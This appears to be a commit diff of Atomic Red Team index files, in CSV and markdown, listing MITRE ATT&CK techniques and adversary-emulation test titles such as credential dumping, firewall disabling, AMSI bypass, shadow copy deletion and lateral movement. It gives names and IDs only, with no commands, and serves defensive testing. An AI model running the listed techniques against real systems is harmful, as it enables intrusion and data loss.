credential-access,T1555,Credentials from Password Stores,3,Dump credentials from Windows Credential Manager With PowerShell [web Credentials],8fd5a296-6772-4766-9991-ff4e92af7240,powershell
credential-access,T1555.003,Credentials from Web Browsers,1,Run Chrome-password Collector,8c05b133-d438-47ca-a630-19cc464c4622,powershell
credential-access,T1555.003,Credentials from Web Browsers,3,LaZagne - Credentials from Browser,9a2915b3-3954-4cce-8c76-00fbf4dbd014,command_prompt
credential-access,T1552.002,Credentials in Registry,1,Enumeration for Credentials in Registry,b6ec082c-7384-46b3-a111-9a9b8b14e5e7,command_prompt
@@ -184,10 +186,11 @@ defense-evasion,T1562.002,Disable Windows Event Logging,2,Kill Event Log Service
defense-evasion,T1562.002,Disable Windows Event Logging,3,Impair Windows Audit Log Policy,5102a3a7-e2d7-4129-9e45-f483f2e0eea8,command_prompt
defense-evasion,T1562.002,Disable Windows Event Logging,4,Clear Windows Audit Policy Config,913c0e4e-4b37-4b78-ad0b-90e7b25010f6,command_prompt
defense-evasion,T1562.004,Disable or Modify System Firewall,2,Disable Microsoft Defender Firewall,88d05800-a5e4-407e-9b53-ece4174f197f,command_prompt
defense-evasion,T1562.004,Disable or Modify System Firewall,3,Allow SMB and RDP on Microsoft Defender Firewall,d9841bf8-f161-4c73-81e9-fd773a5ff8c1,command_prompt
defense-evasion,T1562.004,Disable or Modify System Firewall,4,Opening ports for proxy - HARDRAIN,15e57006-79dd-46df-9bf9-31bc24fb5a80,command_prompt
defense-evasion,T1562.004,Disable or Modify System Firewall,5,Open a local port through Windows Firewall to any profile,9636dd6e-7599-40d2-8eee-ac16434f35ed,powershell
defense-evasion,T1562.004,Disable or Modify System Firewall,6,Allow Executable Through Firewall Located in Non-Standard Location,6f5822d2-d38d-4f48-9bfc-916607ff6b8c,powershell
defense-evasion,T1562.004,Disable or Modify System Firewall,3,Disable Microsoft Defender Firewall via Registry,afedc8c4-038c-4d82-b3e5-623a95f8a612,command_prompt
defense-evasion,T1562.004,Disable or Modify System Firewall,4,Allow SMB and RDP on Microsoft Defender Firewall,d9841bf8-f161-4c73-81e9-fd773a5ff8c1,command_prompt
defense-evasion,T1562.004,Disable or Modify System Firewall,5,Opening ports for proxy - HARDRAIN,15e57006-79dd-46df-9bf9-31bc24fb5a80,command_prompt
defense-evasion,T1562.004,Disable or Modify System Firewall,6,Open a local port through Windows Firewall to any profile,9636dd6e-7599-40d2-8eee-ac16434f35ed,powershell
defense-evasion,T1562.004,Disable or Modify System Firewall,7,Allow Executable Through Firewall Located in Non-Standard Location,6f5822d2-d38d-4f48-9bfc-916607ff6b8c,powershell
defense-evasion,T1562.001,Disable or Modify Tools,10,Unload Sysmon Filter Driver,811b3e76-c41b-430c-ac0d-e2380bfaa164,command_prompt
defense-evasion,T1562.001,Disable or Modify Tools,11,Uninstall Sysmon,a316fb2e-5344-470d-91c1-23e15c374edc,command_prompt
defense-evasion,T1562.001,Disable or Modify Tools,12,AMSI Bypass - AMSI InitFailed,695eed40-e949-40e5-b306-b4031e4154bd,powershell
@@ -214,7 +217,7 @@ defense-evasion,T1564.001,Hidden Files and Directories,3,Create Windows System F
defense-evasion,T1564.001,Hidden Files and Directories,4,Create Windows Hidden File with Attrib,dadb792e-4358-4d8d-9207-b771faa0daa5,command_prompt
defense-evasion,T1564.003,Hidden Window,1,Hidden Window,f151ee37-9e2b-47e6-80e4-550b9f999b7a,powershell
defense-evasion,T1564,Hide Artifacts,1,Extract binary files via VBA,6afe288a-8a8b-4d33-a629-8d03ba9dad3a,powershell
defense-evasion,T1564,Hide Artifacts,2,"Create a user called ""$"" as noted here",2ec63cc2-4975-41a6-bf09-dffdfb610778,command_prompt
defense-evasion,T1564,Hide Artifacts,2,"Create a Hidden User Called ""$""",2ec63cc2-4975-41a6-bf09-dffdfb610778,command_prompt
defense-evasion,T1564,Hide Artifacts,3,"Create an ""Administrator "" user (with a space on the end)",5bb20389-39a5-4e99-9264-aeb92a55a85c,powershell
defense-evasion,T1070,Indicator Removal on Host,1,Indicator Removal using FSUtil,b4115c7a-0e92-47f0-a61e-17e7218b2435,command_prompt
defense-evasion,T1202,Indirect Command Execution,1,Indirect Command Execution - pcalua.exe,cecfea7a-5f03-4cdd-8bc8-6f7c22862440,command_prompt
@@ -233,6 +236,8 @@ defense-evasion,T1218.004,InstallUtil,8,InstallUtil evasive invocation,559e6d06-
defense-evasion,T1078.003,Local Accounts,1,Create local account with admin priviliges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt
defense-evasion,T1127.001,MSBuild,1,MSBuild Bypass Using Inline Tasks (C#),58742c0f-cb01-44cd-a60b-fb26e8871c93,command_prompt
defense-evasion,T1127.001,MSBuild,2,MSBuild Bypass Using Inline Tasks (VB),ab042179-c0c5-402f-9bc8-42741f5ce359,command_prompt
defense-evasion,T1553.005,Mark-of-the-Web Bypass,1,Mount ISO image,002cca30-4778-4891-878a-aaffcfa502fa,powershell
defense-evasion,T1553.005,Mark-of-the-Web Bypass,2,Mount an ISO image and run executable from the ISO,42f22b00-0242-4afc-a61b-0da05041f9cc,powershell
defense-evasion,T1036.004,Masquerade Task or Service,1,Creating W32Time similar named service using schtasks,f9f2fe59-96f7-4a7d-ba9f-a9783200d4c9,command_prompt
defense-evasion,T1036.004,Masquerade Task or Service,2,Creating W32Time similar named service using sc,b721c6ef-472c-4263-a0d9-37f1f4ecff66,command_prompt
defense-evasion,T1036,Masquerading,1,System File Copied to Unusual Location,51005ac7-52e2-45e0-bdab-d17c6d4916cd,command_prompt
@@ -411,6 +416,7 @@ impact,T1531,Account Access Removal,1,Change User Password - Windows,1b99ef28-f8
impact,T1531,Account Access Removal,2,Delete User - Windows,f21a1d7d-a62f-442a-8c3a-2440d43b19e5,command_prompt
impact,T1531,Account Access Removal,3,Remove Account From Domain Admin Group,43f71395-6c37-498e-ab17-897d814a0947,powershell
impact,T1485,Data Destruction,1,Windows - Overwrite file with Sysinternals SDelete,476419b5-aebf-4366-a131-ae3e8dae5fc2,powershell
impact,T1486,Data Encrypted for Impact,5,PureLocker Ransom Note,649349c7-9abf-493b-a7a2-b1aa4d141528,command_prompt
impact,T1490,Inhibit System Recovery,1,Windows - Delete Volume Shadow Copies,43819286-91a9-4369-90ed-d31fb4da2c01,command_prompt
impact,T1490,Inhibit System Recovery,2,Windows - Delete Volume Shadow Copies via WMI,6a3ff8dd-f49c-4272-a658-11c2fe58bd88,command_prompt
impact,T1490,Inhibit System Recovery,3,Windows - wbadmin Delete Windows Backup Catalog,263ba6cb-ea2b-41c9-9d4e-b652dadd002c,command_prompt
@@ -570,6 +576,7 @@ execution,T1053.005,Scheduled Task,5,Task Scheduler via VBA,ecd3fa21-7792-41a2-8
execution,T1053.005,Scheduled Task,6,WMI Invoke-CimMethod Scheduled Task,e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b,powershell
execution,T1569.002,Service Execution,1,Execute a Command as a Service,2382dee2-a75f-49aa-9378-f52df6ed3fb1,command_prompt
execution,T1569.002,Service Execution,2,Use PsExec to execute a command on a remote host,873106b7-cfed-454b-8680-fa9f6400431c,command_prompt
execution,T1072,Software Deployment Tools,1,Radmin Viewer Utility,b4988cad-6ed2-434d-ace5-ea2670782129,command_prompt
execution,T1059.005,Visual Basic,1,Visual Basic script execution to gather local computer information,1620de42-160a-4fe5-bbaf-d3fef0181ce9,powershell
execution,T1059.005,Visual Basic,2,Encoded VBS code execution,e8209d5f-e42d-45e6-9c2f-633ac4f1eefa,powershell
execution,T1059.005,Visual Basic,3,Extract Memory via VBA,8faff437-a114-4547-9a60-749652a03df6,powershell
@@ -598,6 +605,7 @@ lateral-movement,T1021.002,SMB/Windows Admin Shares,1,Map admin share,3386975b-3
lateral-movement,T1021.002,SMB/Windows Admin Shares,2,Map Admin Share PowerShell,514e9cd7-9207-4882-98b1-c8f791bae3c5,powershell
lateral-movement,T1021.002,SMB/Windows Admin Shares,3,Copy and Execute File with PsExec,0eb03d41-79e4-4393-8e57-6344856be1cf,command_prompt
lateral-movement,T1021.002,SMB/Windows Admin Shares,4,Execute command writing output to local Admin Share,d41aaab5-bdfe-431d-a3d5-c29e9136ff46,command_prompt
lateral-movement,T1072,Software Deployment Tools,1,Radmin Viewer Utility,b4988cad-6ed2-434d-ace5-ea2670782129,command_prompt
lateral-movement,T1021.006,Windows Remote Management,1,Enable Windows Remote Management,9059e8de-3d7d-4954-a322-46161880b9cf,powershell
lateral-movement,T1021.006,Windows Remote Management,2,Invoke-Command,5295bd61-bd7e-4744-9d52-85962a4cf2d6,powershell
lateral-movement,T1021.006,Windows Remote Management,3,WinRM Access with Evil-WinRM,efe86d95-44c4-4509-ae42-7bfd9d1f5b3d,powershell
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
3 credential-access T1552.001 Credentials In Files 3 Extracting passwords with findstr 0e56bf29-ff49-4ea5-9af4-3b81283fd513 powershell
4 credential-access T1552.001 Credentials In Files 4 Access unattend.xml 367d4004-5fc0-446d-823f-960c74ae52c3 command_prompt
5 credential-access T1555 Credentials from Password Stores 1 Extract Windows Credential Manager via VBA 234f9b7c-b53d-4f32-897b-b880a6c9ea7b powershell
6 credential-access T1555 Credentials from Password Stores 2 Dump credentials from Windows Credential Manager With PowerShell [windows Credentials] c89becbe-1758-4e7d-a0f4-97d2188a23e3 powershell
7 credential-access T1555 Credentials from Password Stores 3 Dump credentials from Windows Credential Manager With PowerShell [web Credentials] 8fd5a296-6772-4766-9991-ff4e92af7240 powershell
8 credential-access T1555.003 Credentials from Web Browsers 1 Run Chrome-password Collector 8c05b133-d438-47ca-a630-19cc464c4622 powershell
9 credential-access T1555.003 Credentials from Web Browsers 3 LaZagne - Credentials from Browser 9a2915b3-3954-4cce-8c76-00fbf4dbd014 command_prompt
10 credential-access T1552.002 Credentials in Registry 1 Enumeration for Credentials in Registry b6ec082c-7384-46b3-a111-9a9b8b14e5e7 command_prompt
186 defense-evasion T1562.002 Disable Windows Event Logging 3 Impair Windows Audit Log Policy 5102a3a7-e2d7-4129-9e45-f483f2e0eea8 command_prompt
187 defense-evasion T1562.002 Disable Windows Event Logging 4 Clear Windows Audit Policy Config 913c0e4e-4b37-4b78-ad0b-90e7b25010f6 command_prompt
188 defense-evasion T1562.004 Disable or Modify System Firewall 2 Disable Microsoft Defender Firewall 88d05800-a5e4-407e-9b53-ece4174f197f command_prompt
189 defense-evasion T1562.004 Disable or Modify System Firewall 3 Allow SMB and RDP on Microsoft Defender Firewall Disable Microsoft Defender Firewall via Registry d9841bf8-f161-4c73-81e9-fd773a5ff8c1 afedc8c4-038c-4d82-b3e5-623a95f8a612 command_prompt
190 defense-evasion T1562.004 Disable or Modify System Firewall 4 Opening ports for proxy - HARDRAIN Allow SMB and RDP on Microsoft Defender Firewall 15e57006-79dd-46df-9bf9-31bc24fb5a80 d9841bf8-f161-4c73-81e9-fd773a5ff8c1 command_prompt
191 defense-evasion T1562.004 Disable or Modify System Firewall 5 Open a local port through Windows Firewall to any profile Opening ports for proxy - HARDRAIN 9636dd6e-7599-40d2-8eee-ac16434f35ed 15e57006-79dd-46df-9bf9-31bc24fb5a80 powershell command_prompt
192 defense-evasion T1562.004 Disable or Modify System Firewall 6 Allow Executable Through Firewall Located in Non-Standard Location Open a local port through Windows Firewall to any profile 6f5822d2-d38d-4f48-9bfc-916607ff6b8c 9636dd6e-7599-40d2-8eee-ac16434f35ed powershell
193 defense-evasion T1562.004 Disable or Modify System Firewall 7 Allow Executable Through Firewall Located in Non-Standard Location 6f5822d2-d38d-4f48-9bfc-916607ff6b8c powershell
194 defense-evasion T1562.001 Disable or Modify Tools 10 Unload Sysmon Filter Driver 811b3e76-c41b-430c-ac0d-e2380bfaa164 command_prompt
195 defense-evasion T1562.001 Disable or Modify Tools 11 Uninstall Sysmon a316fb2e-5344-470d-91c1-23e15c374edc command_prompt
196 defense-evasion T1562.001 Disable or Modify Tools 12 AMSI Bypass - AMSI InitFailed 695eed40-e949-40e5-b306-b4031e4154bd powershell
217 defense-evasion T1564.001 Hidden Files and Directories 4 Create Windows Hidden File with Attrib dadb792e-4358-4d8d-9207-b771faa0daa5 command_prompt
218 defense-evasion T1564.003 Hidden Window 1 Hidden Window f151ee37-9e2b-47e6-80e4-550b9f999b7a powershell
219 defense-evasion T1564 Hide Artifacts 1 Extract binary files via VBA 6afe288a-8a8b-4d33-a629-8d03ba9dad3a powershell
220 defense-evasion T1564 Hide Artifacts 2 Create a user called "$" as noted here Create a Hidden User Called "$" 2ec63cc2-4975-41a6-bf09-dffdfb610778 command_prompt
221 defense-evasion T1564 Hide Artifacts 3 Create an "Administrator " user (with a space on the end) 5bb20389-39a5-4e99-9264-aeb92a55a85c powershell
222 defense-evasion T1070 Indicator Removal on Host 1 Indicator Removal using FSUtil b4115c7a-0e92-47f0-a61e-17e7218b2435 command_prompt
223 defense-evasion T1202 Indirect Command Execution 1 Indirect Command Execution - pcalua.exe cecfea7a-5f03-4cdd-8bc8-6f7c22862440 command_prompt
236 defense-evasion T1078.003 Local Accounts 1 Create local account with admin priviliges a524ce99-86de-4db6-b4f9-e08f35a47a15 command_prompt
237 defense-evasion T1127.001 MSBuild 1 MSBuild Bypass Using Inline Tasks (C#) 58742c0f-cb01-44cd-a60b-fb26e8871c93 command_prompt
238 defense-evasion T1127.001 MSBuild 2 MSBuild Bypass Using Inline Tasks (VB) ab042179-c0c5-402f-9bc8-42741f5ce359 command_prompt
239 defense-evasion T1553.005 Mark-of-the-Web Bypass 1 Mount ISO image 002cca30-4778-4891-878a-aaffcfa502fa powershell
240 defense-evasion T1553.005 Mark-of-the-Web Bypass 2 Mount an ISO image and run executable from the ISO 42f22b00-0242-4afc-a61b-0da05041f9cc powershell
241 defense-evasion T1036.004 Masquerade Task or Service 1 Creating W32Time similar named service using schtasks f9f2fe59-96f7-4a7d-ba9f-a9783200d4c9 command_prompt
242 defense-evasion T1036.004 Masquerade Task or Service 2 Creating W32Time similar named service using sc b721c6ef-472c-4263-a0d9-37f1f4ecff66 command_prompt
243 defense-evasion T1036 Masquerading 1 System File Copied to Unusual Location 51005ac7-52e2-45e0-bdab-d17c6d4916cd command_prompt
416 impact T1531 Account Access Removal 2 Delete User - Windows f21a1d7d-a62f-442a-8c3a-2440d43b19e5 command_prompt
417 impact T1531 Account Access Removal 3 Remove Account From Domain Admin Group 43f71395-6c37-498e-ab17-897d814a0947 powershell
418 impact T1485 Data Destruction 1 Windows - Overwrite file with Sysinternals SDelete 476419b5-aebf-4366-a131-ae3e8dae5fc2 powershell
419 impact T1486 Data Encrypted for Impact 5 PureLocker Ransom Note 649349c7-9abf-493b-a7a2-b1aa4d141528 command_prompt
420 impact T1490 Inhibit System Recovery 1 Windows - Delete Volume Shadow Copies 43819286-91a9-4369-90ed-d31fb4da2c01 command_prompt
421 impact T1490 Inhibit System Recovery 2 Windows - Delete Volume Shadow Copies via WMI 6a3ff8dd-f49c-4272-a658-11c2fe58bd88 command_prompt
422 impact T1490 Inhibit System Recovery 3 Windows - wbadmin Delete Windows Backup Catalog 263ba6cb-ea2b-41c9-9d4e-b652dadd002c command_prompt
576 execution T1053.005 Scheduled Task 6 WMI Invoke-CimMethod Scheduled Task e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b powershell
577 execution T1569.002 Service Execution 1 Execute a Command as a Service 2382dee2-a75f-49aa-9378-f52df6ed3fb1 command_prompt
578 execution T1569.002 Service Execution 2 Use PsExec to execute a command on a remote host 873106b7-cfed-454b-8680-fa9f6400431c command_prompt
579 execution T1072 Software Deployment Tools 1 Radmin Viewer Utility b4988cad-6ed2-434d-ace5-ea2670782129 command_prompt
580 execution T1059.005 Visual Basic 1 Visual Basic script execution to gather local computer information 1620de42-160a-4fe5-bbaf-d3fef0181ce9 powershell
581 execution T1059.005 Visual Basic 2 Encoded VBS code execution e8209d5f-e42d-45e6-9c2f-633ac4f1eefa powershell
582 execution T1059.005 Visual Basic 3 Extract Memory via VBA 8faff437-a114-4547-9a60-749652a03df6 powershell
605 lateral-movement T1021.002 SMB/Windows Admin Shares 2 Map Admin Share PowerShell 514e9cd7-9207-4882-98b1-c8f791bae3c5 powershell
606 lateral-movement T1021.002 SMB/Windows Admin Shares 3 Copy and Execute File with PsExec 0eb03d41-79e4-4393-8e57-6344856be1cf command_prompt
607 lateral-movement T1021.002 SMB/Windows Admin Shares 4 Execute command writing output to local Admin Share d41aaab5-bdfe-431d-a3d5-c29e9136ff46 command_prompt
608 lateral-movement T1072 Software Deployment Tools 1 Radmin Viewer Utility b4988cad-6ed2-434d-ace5-ea2670782129 command_prompt
609 lateral-movement T1021.006 Windows Remote Management 1 Enable Windows Remote Management 9059e8de-3d7d-4954-a322-46161880b9cf powershell
610 lateral-movement T1021.006 Windows Remote Management 2 Invoke-Command 5295bd61-bd7e-4744-9d52-85962a4cf2d6 powershell
611 lateral-movement T1021.006 Windows Remote Management 3 WinRM Access with Evil-WinRM efe86d95-44c4-4509-ae42-7bfd9d1f5b3d powershell
+32 -13
@@ -15,7 +15,9 @@
- Atomic Test #2: Cat the contents of a Kubernetes service account token file [linux]
- [T1056.004 Credential API Hooking](../../T1056.004/T1056.004.md)
- Atomic Test #1: Hook PowerShell TLS Encrypt/Decrypt Messages [windows]
- T1110.004 Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1110.004 Credential Stuffing](../../T1110.004/T1110.004.md)
- Atomic Test #1: SSH Credential Stuffing From Linux [linux]
- Atomic Test #2: SSH Credential Stuffing From MacOS [macos]
- [T1552.001 Credentials In Files](../../T1552.001/T1552.001.md)
- Atomic Test #1: Extract Browser and System credentials with LaZagne [macos]
- Atomic Test #2: Extract passwords with grep [macos, linux]
@@ -24,6 +26,8 @@
- Atomic Test #5: Find and Access Github Credentials [macos, linux]
- [T1555 Credentials from Password Stores](../../T1555/T1555.md)
- Atomic Test #1: Extract Windows Credential Manager via VBA [windows]
- Atomic Test #2: Dump credentials from Windows Credential Manager With PowerShell [windows Credentials] [windows]
- Atomic Test #3: Dump credentials from Windows Credential Manager With PowerShell [web Credentials] [windows]
- [T1555.003 Credentials from Web Browsers](../../T1555.003/T1555.003.md)
- Atomic Test #1: Run Chrome-password Collector [windows]
- Atomic Test #2: Search macOS Safari Cookies [macos]
@@ -105,7 +109,9 @@
- Atomic Test #2: Discover Private SSH Keys [macos, linux]
- Atomic Test #3: Copy Private SSH Keys with CP [linux]
- Atomic Test #4: Copy Private SSH Keys with rsync [macos, linux]
- T1003.007 Proc Filesystem [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1003.007 Proc Filesystem](../../T1003.007/T1003.007.md)
- Atomic Test #1: Dump individual process memory with sh (Local) [linux]
- Atomic Test #2: Dump individual process memory with Python (Local) [linux]
- T1606.002 SAML Tokens [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1003.002 Security Account Manager](../../T1003.002/T1003.002.md)
- Atomic Test #1: Registry dump of SAM, creds, and secrets [windows]
@@ -370,6 +376,7 @@
- Atomic Test #3: Disable tty_tickets for sudo caching [macos, linux]
- [T1543.002 Systemd Service](../../T1543.002/T1543.002.md)
- Atomic Test #1: Create Systemd Service [linux]
- Atomic Test #2: Create Systemd Service file, Enable the service , Modify and Reload the service. [linux]
- [T1053.006 Systemd Timers](../../T1053.006/T1053.006.md)
- Atomic Test #1: Create Systemd Service and Timer [linux]
- T1055.003 Thread Execution Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -494,10 +501,11 @@
- [T1562.004 Disable or Modify System Firewall](../../T1562.004/T1562.004.md)
- Atomic Test #1: Disable firewall [linux]
- Atomic Test #2: Disable Microsoft Defender Firewall [windows]
- Atomic Test #3: Allow SMB and RDP on Microsoft Defender Firewall [windows]
- Atomic Test #4: Opening ports for proxy - HARDRAIN [windows]
- Atomic Test #5: Open a local port through Windows Firewall to any profile [windows]
- Atomic Test #6: Allow Executable Through Firewall Located in Non-Standard Location [windows]
- Atomic Test #3: Disable Microsoft Defender Firewall via Registry [windows]
- Atomic Test #4: Allow SMB and RDP on Microsoft Defender Firewall [windows]
- Atomic Test #5: Opening ports for proxy - HARDRAIN [windows]
- Atomic Test #6: Open a local port through Windows Firewall to any profile [windows]
- Atomic Test #7: Allow Executable Through Firewall Located in Non-Standard Location [windows]
- [T1562.001 Disable or Modify Tools](../../T1562.001/T1562.001.md)
- Atomic Test #1: Disable syslog [linux]
- Atomic Test #2: Disable Cb Response [linux]
@@ -571,7 +579,7 @@
- Atomic Test #1: Hidden Window [windows]
- [T1564 Hide Artifacts](../../T1564/T1564.md)
- Atomic Test #1: Extract binary files via VBA [windows]
- Atomic Test #2: Create a user called "$" as noted here [windows]
- Atomic Test #2: Create a Hidden User Called "$" [windows]
- Atomic Test #3: Create an "Administrator " user (with a space on the end) [windows]
- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1562.003 Impair Command History Logging](../../T1562.003/T1562.003.md)
@@ -621,13 +629,16 @@
- Atomic Test #1: MSBuild Bypass Using Inline Tasks (C#) [windows]
- Atomic Test #2: MSBuild Bypass Using Inline Tasks (VB) [windows]
- T1134.003 Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1553.005 Mark-of-the-Web Bypass [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1553.005 Mark-of-the-Web Bypass](../../T1553.005/T1553.005.md)
- Atomic Test #1: Mount ISO image [windows]
- Atomic Test #2: Mount an ISO image and run executable from the ISO [windows]
- [T1036.004 Masquerade Task or Service](../../T1036.004/T1036.004.md)
- Atomic Test #1: Creating W32Time similar named service using schtasks [windows]
- Atomic Test #2: Creating W32Time similar named service using sc [windows]
- [T1036 Masquerading](../../T1036/T1036.md)
- Atomic Test #1: System File Copied to Unusual Location [windows]
- T1036.005 Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1036.005 Match Legitimate Name or Location](../../T1036.005/T1036.005.md)
- Atomic Test #1: Execute a process from a directory masquerading as the current parent directory. [macos, linux]
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1578 Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1112 Modify Registry](../../T1112/T1112.md)
@@ -836,10 +847,12 @@
- [T1098 Account Manipulation](../../T1098/T1098.md)
- Atomic Test #1: Admin Account Manipulate [windows]
- Atomic Test #2: Domain Account and Group Manipulate [windows]
- Atomic Test #3: AWS - Create a group and add a user to that group [iaas:aws]
- T1547.014 Active Setup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1098.003 Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1137.006 Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1098.001 Additional Cloud Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1098.001 Additional Cloud Credentials](../../T1098.001/T1098.001.md)
- Atomic Test #1: AWS - Create Access Key and Secret Key [iaas:aws]
- T1546.009 AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1546.010 AppInit DLLs](../../T1546.010/T1546.010.md)
- Atomic Test #1: Install AppInit Shim [windows]
@@ -871,7 +884,8 @@
- Atomic Test #3: Registry-free process scope COR_PROFILER [windows]
- [T1546.001 Change Default File Association](../../T1546.001/T1546.001.md)
- Atomic Test #1: Change Default File Association [windows]
- T1136.003 Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1136.003 Cloud Account](../../T1136.003/T1136.003.md)
- Atomic Test #1: AWS - Create a new IAM user [iaas:aws]
- T1078.004 Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1542.002 Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1546.015 Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -1013,6 +1027,7 @@
- T1542.001 System Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1543.002 Systemd Service](../../T1543.002/T1543.002.md)
- Atomic Test #1: Create Systemd Service [linux]
- Atomic Test #2: Create Systemd Service file, Enable the service , Modify and Reload the service. [linux]
- [T1053.006 Systemd Timers](../../T1053.006/T1053.006.md)
- Atomic Test #1: Create Systemd Service and Timer [linux]
- T1542.005 TFTP Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -1055,6 +1070,7 @@
- Atomic Test #2: Encrypt files using 7z (Linux) [linux]
- Atomic Test #3: Encrypt files using ccrypt (Linux) [linux]
- Atomic Test #4: Encrypt files using openssl (Linux) [linux]
- Atomic Test #5: PureLocker Ransom Note [windows]
- T1565 Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1491 Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1498.001 Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -1432,7 +1448,8 @@
- Atomic Test #1: Execute a Command as a Service [windows]
- Atomic Test #2: Use PsExec to execute a command on a remote host [windows]
- T1129 Shared Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1072 Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1072 Software Deployment Tools](../../T1072/T1072.md)
- Atomic Test #1: Radmin Viewer Utility [windows]
- T1153 Source [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1569 System Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1053.006 Systemd Timers](../../T1053.006/T1053.006.md)
@@ -1487,7 +1504,8 @@
- T1021.004 SSH [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1563.001 SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1051 Shared Webroot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1072 Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1072 Software Deployment Tools](../../T1072/T1072.md)
- Atomic Test #1: Radmin Viewer Utility [windows]
- T1080 Taint Shared Content [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1021.005 VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -1535,6 +1553,7 @@
- Atomic Test #11: OSTAP Worming Activity [windows]
- Atomic Test #12: svchost writing a file to a UNC path [windows]
- Atomic Test #13: Download a File with Windows Defender MpCmdRun.exe [windows]
- Atomic Test #14: whois file download [linux, macos]
- [T1090.001 Internal Proxy](../../T1090.001/T1090.001.md)
- Atomic Test #1: Connection Proxy [macos, linux]
- Atomic Test #2: Connection Proxy for macOS UI [macos]
@@ -11,7 +11,8 @@
- [T1552.007 Container API](../../T1552.007/T1552.007.md)
- Atomic Test #1: ListSecrets [macos, linux]
- Atomic Test #2: Cat the contents of a Kubernetes service account token file [linux]
- T1110.004 Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1110.004 Credential Stuffing](../../T1110.004/T1110.004.md)
- Atomic Test #1: SSH Credential Stuffing From Linux [linux]
- [T1552.001 Credentials In Files](../../T1552.001/T1552.001.md)
- Atomic Test #2: Extract passwords with grep [macos, linux]
- Atomic Test #5: Find and Access Github Credentials [macos, linux]
@@ -37,7 +38,9 @@
- Atomic Test #2: Discover Private SSH Keys [macos, linux]
- Atomic Test #3: Copy Private SSH Keys with CP [linux]
- Atomic Test #4: Copy Private SSH Keys with rsync [macos, linux]
- T1003.007 Proc Filesystem [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1003.007 Proc Filesystem](../../T1003.007/T1003.007.md)
- Atomic Test #1: Dump individual process memory with sh (Local) [linux]
- Atomic Test #2: Dump individual process memory with Python (Local) [linux]
- T1606.002 SAML Tokens [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1555.002 Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1528 Steal Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -137,6 +140,7 @@
- Atomic Test #3: Disable tty_tickets for sudo caching [macos, linux]
- [T1543.002 Systemd Service](../../T1543.002/T1543.002.md)
- Atomic Test #1: Create Systemd Service [linux]
- Atomic Test #2: Create Systemd Service file, Enable the service , Modify and Reload the service. [linux]
- [T1053.006 Systemd Timers](../../T1053.006/T1053.006.md)
- Atomic Test #1: Create Systemd Service and Timer [linux]
- [T1546.005 Trap](../../T1546.005/T1546.005.md)
@@ -234,7 +238,8 @@
- T1078.003 Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1036.004 Masquerade Task or Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1036 Masquerading [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1036.005 Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1036.005 Match Legitimate Name or Location](../../T1036.005/T1036.005.md)
- Atomic Test #1: Execute a process from a directory masquerading as the current parent directory. [macos, linux]
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1578 Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1601 Modify System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -401,10 +406,12 @@
- T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
# persistence
- T1098 Account Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
